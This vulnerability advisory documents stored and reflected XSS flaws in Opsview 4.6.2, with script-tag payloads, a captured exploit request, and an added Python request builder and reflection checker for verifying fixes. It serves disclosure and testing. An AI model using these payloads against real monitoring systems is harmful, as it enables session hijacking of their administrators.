# Exploit title: Opsview 4.6.2 - Multiple XSS
# Date: 07-06-2015
# Vendor homepage: www.opsview.com
# Version: 4.6.2
# CVE: CVE-2015-4420
# Author: Dolev Farhi @dolevf
# Tested On: Kali Linux + Windows 7
# Details:
# --------
# Opsview is a monitoring system based on Nagios Core. Opsview 4.6.2 (the latest
# version at the time of writing) is prone to several stored and reflected XSS
# vulnerabilities.

1. Stored XSS through a malicious check plugin

   a. Create a plugin with the following content:

      #!/bin/bash
      echo '<script>alert("script0t0s")</script>'
      exit 2

   b. Create a new check and assign this plugin.
   c. Once a host uses this check, navigate to the event page; the plugin output
      is rendered unescaped and the script executes.
   d. Once a user/admin acknowledges this critical event (exit status 2), the
      script runs in that user's browser before the acknowledgement is submitted.

2. Stored XSS in host profile

   a. Add a host.
   b. In the description field of the host, enter the following:

      <script>alert(document.cookie)</script>

   c. Save the settings.
   d. Once a user/admin views the host settings, the script executes.

3. Reflected XSS in the "Test service check" page

   a. Add a new service check.
   b. Test the new service check against any host and supply the following as
      the command-line arguments:

      <script>alert("test")</script>

   c. The payload is reflected to the screen immediately.

   Captured request (the payload is sent URL-encoded in plugin_args; session
   cookie values redacted):

      POST /state/service/166/exec HTTP/1.1
      Host: 192.168.0.20
      User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0
      Accept: text/plain, */*; q=0.01
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      X-Requested-With: XMLHttpRequest
      Referer: http://192.168.0.20/status/service?host_state=0&host_filter=handled&host=opsview
      Content-Length: 105
      Cookie: PHPSESSID= auth_tkt=
      Connection: keep-alive
      Pragma: no-cache
      Cache-Control: no-cache

      plugin_args=%3Cscript%3Ealert(%22opsview%22)%3C%2Fscript%3E&_CSRFToken=0x84BCDAD00D5111E5988CB34E7AFD915
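The following is an added example, not part of the original advisory and not Opsview's code. It rebuilds the captured POST body for the reflected case (item 3) and classifies whether a response reflects the payload raw, HTML-escaped, or not at all, which is the check to run when verifying a fix. The encode_uri_component() helper assumes the XHR used JavaScript's encodeURIComponent(), which explains why the parentheses in the captured body are not percent-encoded; render_test_output() is a toy stand-in for the result panel, written here only to show the vulnerable behaviour beside the escaped one. The CSRF token is the value from the captured request above and is only valid for that session.

```python
"""Request builder and reflection checker for the Opsview 4.6.2 reflected XSS.

Added example for this advisory; not the author's or vendor's code.
"""
import html
from urllib.parse import quote

# Payload and CSRF token exactly as seen in the captured request above.
PAYLOAD = '<script>alert("opsview")</script>'
CSRF_TOKEN = "0x84BCDAD00D5111E5988CB34E7AFD915"  # captured value; per-session


def encode_uri_component(value: str) -> str:
    """Mimic JavaScript's encodeURIComponent() (assumption: that is what the
    Opsview XHR used). Everything except A-Z a-z 0-9 - _ . ! ~ * ' ( ) is
    percent-encoded, so the parentheses of alert(...) stay literal while
    '<', '>', '"' and '/' become %3C, %3E, %22 and %2F."""
    return quote(value, safe="!*'()")


def build_exec_body(payload: str, csrf_token: str) -> str:
    """Build the x-www-form-urlencoded body for POST /state/service/<id>/exec."""
    return f"plugin_args={encode_uri_component(payload)}&_CSRFToken={csrf_token}"


def build_exec_request(host: str, service_id: int, payload: str,
                       csrf_token: str) -> str:
    """Return a minimal raw HTTP/1.1 request (headers + body) for the test
    endpoint. Session cookies are deliberately omitted; add your own."""
    body = build_exec_body(payload, csrf_token)
    headers = [
        f"POST /state/service/{service_id}/exec HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With: XMLHttpRequest",
        f"Content-Length: {len(body)}",
    ]
    return "\r\n".join(headers) + "\r\n\r\n" + body


def classify_reflection(response_body: str, payload: str) -> str:
    """'raw' if the payload comes back unencoded (exploitable), 'escaped' if it
    comes back HTML-entity-encoded (fixed), 'absent' if it is not reflected."""
    if payload in response_body:
        return "raw"
    if html.escape(payload, quote=True) in response_body:
        return "escaped"
    return "absent"


def render_test_output(command_output: str, escape: bool) -> str:
    """Toy stand-in (constructed, not Opsview's template) for the test-check
    result panel: the vulnerable build interpolates the command output as-is,
    the corrected build entity-encodes it first."""
    shown = html.escape(command_output, quote=True) if escape else command_output
    return f"<pre class='check-output'>{shown}</pre>"


if __name__ == "__main__":
    print(build_exec_request("192.168.0.20", 166, PAYLOAD, CSRF_TOKEN))
    for escape in (False, True):
        page = render_test_output(PAYLOAD, escape=escape)
        print(f"escape={escape}: {classify_reflection(page, PAYLOAD)}")
```

Running the module prints the rebuilt request and shows the same payload classified as "raw" against the unescaped panel and "escaped" against the encoded one; pointing classify_reflection() at a real response from a patched instance is the quickest regression check for this bug.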